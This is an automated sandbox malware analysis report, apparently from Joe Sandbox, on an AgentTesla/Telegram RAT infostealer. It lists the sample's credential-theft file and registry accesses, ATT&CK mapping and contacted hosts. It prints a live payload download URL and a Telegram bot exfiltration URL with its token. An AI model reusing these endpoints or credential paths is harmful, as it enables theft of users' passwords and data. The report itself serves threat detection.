Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

1_2_004034F7

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 8436, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 8436, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Source: Yara match	File source: 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 8436, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 8436, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 8436, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Web Service	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	11 Input Capture	127 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	111 Process Injection	2 Obfuscated Files or Information	1 Credentials in Registry	431 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	21 Encrypted Channel	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	11 Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	341 Virtualization/Sandbox Evasion	LSA Secrets	341 Virtualization/Sandbox Evasion	SSH	2 Clipboard Data	Data Transfer Size Limits	114 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	111 Process Injection	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	26%	Virustotal		Browse
file.exe	22%	ReversingLabs	Win32.Downloader.GuLoader

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\ConfigXML_ScenarioProfile.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MsMpCom.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
msdvc.com	5%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://msdvc.com/j	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
https://d1ktMAcOA2o.nett-	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	0%	Avira URL Cloud	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	Avira URL Cloud	safe
https://api.ipify.org%t-	0%	Avira URL Cloud	safe
https://api.ipify.org%%startupfolder%	0%	Avira URL Cloud	safe
https://msdvc.com/oluwa_RcQBQnZSyJ230.bin	100%	Avira URL Cloud	malware
https://d1ktMAcOA2o.net	0%	Avira URL Cloud	safe
http://VrxAgw.com	0%	Avira URL Cloud	safe
https://msdvc.com/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
msdvc.com	119.18.54.23	true	true	5%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocument	false		high
https://msdvc.com/oluwa_RcQBQnZSyJ230.bin	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://msdvc.com/j	CasPol.exe, 00000006.00000002.9083705847.0000000001018000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://127.0.0.1:HTTP/1.1	CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://d1ktMAcOA2o.nett-	CasPol.exe, 00000006.00000002.9108499877.000000001D5D9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.telegram.org	CasPol.exe, 00000006.00000002.9108904236.000000001D60C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/	CasPol.exe, 00000006.00000002.9084920073.0000000001092000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000003.5392527483.0000000001092000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org%t-	CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://support.google.com/chrome/?p=plugin_flash	CasPol.exe, 00000006.00000002.9108033528.000000001D577000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org%%startupfolder%	CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://nsis.sf.net/NSIS_ErrorError	file.exe	false		high
http://api.telegram.org	CasPol.exe, 00000006.00000002.9109123482.000000001D620000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CasPol.exe, 00000006.00000002.9108904236.000000001D60C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://d1ktMAcOA2o.net	CasPol.exe, 00000006.00000002.9108499877.000000001D5D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000003.4395944498.000000001C2B1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9108808385.000000001D606000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://VrxAgw.com	CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocumentdocument-----	CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://msdvc.com/	CasPol.exe, 00000006.00000002.9083705847.0000000001018000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
119.18.54.23	msdvc.com	India		394695	PUBLIC-DOMAIN-REGISTRYUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	623387
Start date and time: 10/05/202214:04:16	2022-05-10 14:04:16 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/7@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 29.5% (good quality ratio 29.1%) Quality average: 87.5% Quality standard deviation: 21.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 213 Number of non-executed functions: 73
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, svchost.exe, MusNotificationUx.exe
Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, ctldl.windowsupdate.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:06:39	API Interceptor	2785x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
149.154.167.220	SHIPPING ADVICE#202205.exe	Get hash	malicious	Browse
	doc202205100001883010001,pdf.exe	Get hash	malicious	Browse
	DHL.apk	Get hash	malicious	Browse
	Statement of account# 200122001100.exe	Get hash	malicious	Browse
	4oGNnPQu6F.exe	Get hash	malicious	Browse
	Request for Quotation.exe	Get hash	malicious	Browse
	Bank Payment Advice-09.05.2022.exe	Get hash	malicious	Browse
	potwierdzenie wplaty.exe	Get hash	malicious	Browse
	Inv,Delivery note.jpg.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Bulz.779298.17068.exe	Get hash	malicious	Browse
	sTgblx2QnU.exe	Get hash	malicious	Browse
	bbbb.exe	Get hash	malicious	Browse
	Gnvjn2wVXc.exe	Get hash	malicious	Browse
	StartGame.exe	Get hash	malicious	Browse
	dSJT38E9q3.exe	Get hash	malicious	Browse
	VEL-P01225013B.exe	Get hash	malicious	Browse
	WEsJ9FAJc3.exe	Get hash	malicious	Browse
	Dekont1.pdf.exe	Get hash	malicious	Browse
	i3g9YoOXFn.exe	Get hash	malicious	Browse
	CASTEC VINA TRADING CO - NEW PO#2022CTV06.pif.exe	Get hash	malicious	Browse
119.18.54.23	ROLP0967_1113398095.doc	Get hash	malicious	Browse	www.anikastyle.com/ram2base.php
119.18.54.23	ROLP0967_1113398095.doc	Get hash	malicious	Browse	www.anikastyle.com/ram2base.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api.telegram.org	SHIPPING ADVICE#202205.exe	Get hash	malicious	Browse	149.154.167.220
	doc202205100001883010001,pdf.exe	Get hash	malicious	Browse	149.154.167.220
	QUOTATION.xlsx	Get hash	malicious	Browse	149.154.167.220
	Statement of account# 200122001100.exe	Get hash	malicious	Browse	149.154.167.220
	8J63Acr1IY.exe	Get hash	malicious	Browse	149.154.167.220
	4oGNnPQu6F.exe	Get hash	malicious	Browse	149.154.167.220
	Request for Quotation.exe	Get hash	malicious	Browse	149.154.167.220
	Bank Payment Advice-09.05.2022.exe	Get hash	malicious	Browse	149.154.167.220
	potwierdzenie wplaty.exe	Get hash	malicious	Browse	149.154.167.220
	Inv,Delivery note.jpg.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Variant.Bulz.779298.17068.exe	Get hash	malicious	Browse	149.154.167.220
	PO#2022CTV05-47.exe	Get hash	malicious	Browse	149.154.167.220
	HBL+MBL ADVICE DOCUMENTS.exe	Get hash	malicious	Browse	149.154.167.220
	sTgblx2QnU.exe	Get hash	malicious	Browse	149.154.167.220
	bbbb.exe	Get hash	malicious	Browse	149.154.167.220
	Gnvjn2wVXc.exe	Get hash	malicious	Browse	149.154.167.220
	StartGame.exe	Get hash	malicious	Browse	149.154.167.220
	dSJT38E9q3.exe	Get hash	malicious	Browse	149.154.167.220
	VEL-P01225013B.exe	Get hash	malicious	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELEGRAMRU	SHIPPING ADVICE#202205.exe	Get hash	malicious	Browse	149.154.167.220
	doc202205100001883010001,pdf.exe	Get hash	malicious	Browse	149.154.167.220
	DHL.apk	Get hash	malicious	Browse	149.154.167.220
	RSX.exe	Get hash	malicious	Browse	149.154.167.99
	Statement of account# 200122001100.exe	Get hash	malicious	Browse	149.154.167.220
	4oGNnPQu6F.exe	Get hash	malicious	Browse	149.154.167.220
	Request for Quotation.exe	Get hash	malicious	Browse	149.154.167.220
	Bank Payment Advice-09.05.2022.exe	Get hash	malicious	Browse	149.154.167.220
	potwierdzenie wplaty.exe	Get hash	malicious	Browse	149.154.167.220
	Inv,Delivery note.jpg.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Variant.Bulz.779298.17068.exe	Get hash	malicious	Browse	149.154.167.220
	sTgblx2QnU.exe	Get hash	malicious	Browse	149.154.167.220
	bbbb.exe	Get hash	malicious	Browse	149.154.167.220
	Gnvjn2wVXc.exe	Get hash	malicious	Browse	149.154.167.220
	OSik7MASk1.exe	Get hash	malicious	Browse	149.154.167.99
	StartGame.exe	Get hash	malicious	Browse	149.154.167.220
	dBG1JRHe8d.exe	Get hash	malicious	Browse	149.154.167.99
	chMuEuX5f7.exe	Get hash	malicious	Browse	149.154.167.99
	dSJT38E9q3.exe	Get hash	malicious	Browse	149.154.167.220
	HdkaE73Rbf.exe	Get hash	malicious	Browse	149.154.167.99
PUBLIC-DOMAIN-REGISTRYUS	WSSXHPLWvc.exe	Get hash	malicious	Browse	162.222.225.16
	Product_items.xlsx	Get hash	malicious	Browse	208.91.198.38
	Bank payment receipt.pdf.exe	Get hash	malicious	Browse	162.222.225.29
	SecuriteInfo.com.Scr.Malcodegdn30.26571.exe	Get hash	malicious	Browse	208.91.198.46
	Urgent purchase order.exe	Get hash	malicious	Browse	208.91.198.46
	https://drive.google.com/uc?export=download&id=1mmXl38H2-j7e7hD_UJbEMMSnMTA0BtQV	Get hash	malicious	Browse	208.91.199.159
	SecuriteInfo.com.W32.AIDetectNet.01.19489.exe	Get hash	malicious	Browse	208.91.198.46
	MGAbSNToXb.exe	Get hash	malicious	Browse	208.91.198.46
	PO-S.L 45675675.xlsx	Get hash	malicious	Browse	162.222.225.16
	Payment Copy.exe	Get hash	malicious	Browse	199.79.62.21
	https://ludoearn.xyz/eitt/tntiadiileeequ%5C	Get hash	malicious	Browse	162.222.225.246
	WEsJ9FAJc3.exe	Get hash	malicious	Browse	5.100.152.127
	Request for Quotation.exe	Get hash	malicious	Browse	199.79.62.21
	https://securepubads.g.doubleclick.net/pcs/view?adurl=https%3a%2f%2fcn97me.codesandbox.io?dg=YXBAYWR2YW50YWdlb2cuY29t	Get hash	malicious	Browse	103.195.185.115
	DHL 9335225.exe	Get hash	malicious	Browse	208.91.198.38
	PO43456001232345566778898-MAY 2022.exe	Get hash	malicious	Browse	208.91.198.38
	Request Quotatio.exe	Get hash	malicious	Browse	103.211.216.141
	Revised statement of account.exe	Get hash	malicious	Browse	204.11.58.151
	New Order.exe	Get hash	malicious	Browse	199.79.62.21
	overdue invoice.exe	Get hash	malicious	Browse	103.211.216.141

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	NEW_ORDER.xll	Get hash	malicious	Browse	149.154.167.220
	fax - Payment - B.xll	Get hash	malicious	Browse	149.154.167.220
	Neue Bestellung.exe	Get hash	malicious	Browse	149.154.167.220
	REQUEST FOR QUOTATION.exe	Get hash	malicious	Browse	149.154.167.220
	764E11E33-4DBB-5B78-A566-33D1290B05E2 .pdf.exe	Get hash	malicious	Browse	149.154.167.220
	12240322409_22020422_054822678_Hesap0zeti.rar.pdf.CAB.exe	Get hash	malicious	Browse	149.154.167.220
	Z210915BBSNKKMC225979 pdf.exe	Get hash	malicious	Browse	149.154.167.220
	sunny cripted.exe	Get hash	malicious	Browse	149.154.167.220
	SHIPPING ADVICE#202205.exe	Get hash	malicious	Browse	149.154.167.220
	PO No 2298.exe	Get hash	malicious	Browse	149.154.167.220
	doc202205100001883010001,pdf.exe	Get hash	malicious	Browse	149.154.167.220
	854F1E97-5DBB-4A87-A566-33D9012B05E2.exe	Get hash	malicious	Browse	149.154.167.220
	AccountStatement.pdf.exe	Get hash	malicious	Browse	149.154.167.220
	conhost.exe	Get hash	malicious	Browse	149.154.167.220
	setup.exe	Get hash	malicious	Browse	149.154.167.220
	Installer.exe	Get hash	malicious	Browse	149.154.167.220
	8cEt47RlOW.exe	Get hash	malicious	Browse	149.154.167.220
	MtBDy2a3nQ.exe	Get hash	malicious	Browse	149.154.167.220
	https://vlws-site.webflow.io	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.DownLoader44.58468.21897.exe	Get hash	malicious	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	ShipmentReceipt_Notification_2022march05PDF.vbs	Get hash	malicious	Browse	119.18.54.23
	FHqksAC2JH.exe	Get hash	malicious	Browse	119.18.54.23
	DOC-DAMIAN _ 10TH_MAY_2022 _.HTM	Get hash	malicious	Browse	119.18.54.23
	PAYMENT_SWIFT-MT103.html	Get hash	malicious	Browse	119.18.54.23
	informe_31090.xlsm	Get hash	malicious	Browse	119.18.54.23
	OFFICIAL TAX DEMAND NOTICE.html	Get hash	malicious	Browse	119.18.54.23
	DotRemittance1956.htm	Get hash	malicious	Browse	119.18.54.23
	htmlviewer.html	Get hash	malicious	Browse	119.18.54.23
	Document for wang@schulergroup.com.HTML	Get hash	malicious	Browse	119.18.54.23
	SecuriteInfo.com.W32.AIDetectNet.01.12259.exe	Get hash	malicious	Browse	119.18.54.23
	Payment Details.docx	Get hash	malicious	Browse	119.18.54.23
	Bayaran Balik Cukai Terlebih Bayar.exe	Get hash	malicious	Browse	119.18.54.23
	ATT93615.HTM	Get hash	malicious	Browse	119.18.54.23
	https://endologix-my.sharepoint.com/:w:/p/nlebrun/ERDCxPOf8-RFnkAYne3_EEsBbi80uHAZbG3XA974esS6Ag?e=6lujpe	Get hash	malicious	Browse	119.18.54.23
	https://eurostoreaustralia.talentlms.com/shared/start/key:LZGIDNHR	Get hash	malicious	Browse	119.18.54.23
	https://endologix-my.sharepoint.com:443/:f:/p/vyam/EghcZ6xUoe1Gqar0H4rPPFgB0d77ZIkJCU6kknoXEw9hVg?e=5%3aLx61rF&at=9	Get hash	malicious	Browse	119.18.54.23
	https://endologix-my.sharepoint.com:443/:f:/p/vyam/EghcZ6xUoe1Gqar0H4rPPFgB0d77ZIkJCU6kknoXEw9hVg?e=5%3aoEh7xB&at=9	Get hash	malicious	Browse	119.18.54.23
	hvWRyao1F9.exe	Get hash	malicious	Browse	119.18.54.23
	https://express.adobe.com/page/wRzS9c2Tkssb5/	Get hash	malicious	Browse	119.18.54.23
	http://bluesail.cc/Webmail/webmail.php?email=sean@virtualintelligencebriefing.com	Get hash	malicious	Browse	119.18.54.23

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll	file.exe	Get hash	malicious	Browse
	Bayaran Balik Cukai Terlebih Bayar.exe	Get hash	malicious	Browse
	Bayaran Balik Cukai Terlebih Bayar.exe	Get hash	malicious	Browse
	7RsSycKaNc.exe	Get hash	malicious	Browse
	7RsSycKaNc.exe	Get hash	malicious	Browse
	potwierdzenie wplaty.exe	Get hash	malicious	Browse
	potwierdzenie wplaty.exe	Get hash	malicious	Browse
	Docs advice copy.exe	Get hash	malicious	Browse
	Docs advice copy.exe	Get hash	malicious	Browse
	Transferencia desde ING.exe	Get hash	malicious	Browse
	Transferencia desde ING.exe	Get hash	malicious	Browse
	shipping document.exe	Get hash	malicious	Browse
	shipping document.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Woreflint.Acl.5382.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Woreflint.Acl.5382.exe	Get hash	malicious	Browse
	SecuriteInfo.com.generic.ml.1686.exe	Get hash	malicious	Browse
	gunzipped.exe	Get hash	malicious	Browse
	gunzipped.exe	Get hash	malicious	Browse
	TT Aplication -Rp. 6.500,000_pdf.exe	Get hash	malicious	Browse
	TT Aplication -Rp. 6.500,000_pdf.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\ConfigXML_ScenarioProfile.dll	file.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\MsMpCom.dll	file.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Aqua_3.bmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
Category:	dropped
Size (bytes):	5004
Entropy (8bit):	7.815894782719166
Encrypted:	false
SSDEEP:	96:BSTzRE92lvCfr4Y6hXqlvrfgAbJyLDLA4S+YrQslx:oXRnlKfrZ6h6lvncASiP
MD5:	12C11AD60C15E44F8297C052CFBAA434
SHA1:	3849A2C99770D1BB104AF27D34DCD95E8B4986A5
SHA-256:	71792E7507EE62E8EBC9BC1230947A8A4E2A5CAC57CD43DF1E379D91F5E3FDA2
SHA-512:	E91B30CFAFD4B651852D4F12E6A3BEF92A528C14C56FD195F6EA5EAF1D82308704BDD7373AA9DD63CE606BB25EAD7A33D29C8B068B843E0F1225177AA2F35E72
Malicious:	false
Reputation:	low
Preview:	......JFIF.....d.d.....:Exif..MM.......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(.......\|2._......&..?.i...x....o....xCB 